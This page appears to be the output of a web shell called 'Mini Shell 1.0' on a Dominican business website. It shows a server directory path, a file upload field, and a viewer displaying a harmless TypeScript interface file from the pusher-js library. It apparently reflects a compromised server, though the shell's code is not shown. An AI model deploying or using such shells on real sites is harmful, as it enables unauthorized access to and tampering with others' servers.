HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

¡Página no encontrada!

La página que busca no se encuentra en nuestro servidor.

Volver al inicio
DIR: /var/www/devs.lapieza.net/node_modules/pusher-js/src/core/transports/
Upload File :
Current File : /var/www/devs.lapieza.net/node_modules/pusher-js/src/core/transports/url_scheme.ts
export interface URLSchemeParams {
  useTLS: boolean;
  hostTLS: string;
  hostNonTLS: string;
  httpPath: string;
}

interface URLScheme {
  getInitial(key: string, params: any): string;
  getPath?(key: string, options: any): string;
}

export default URLScheme;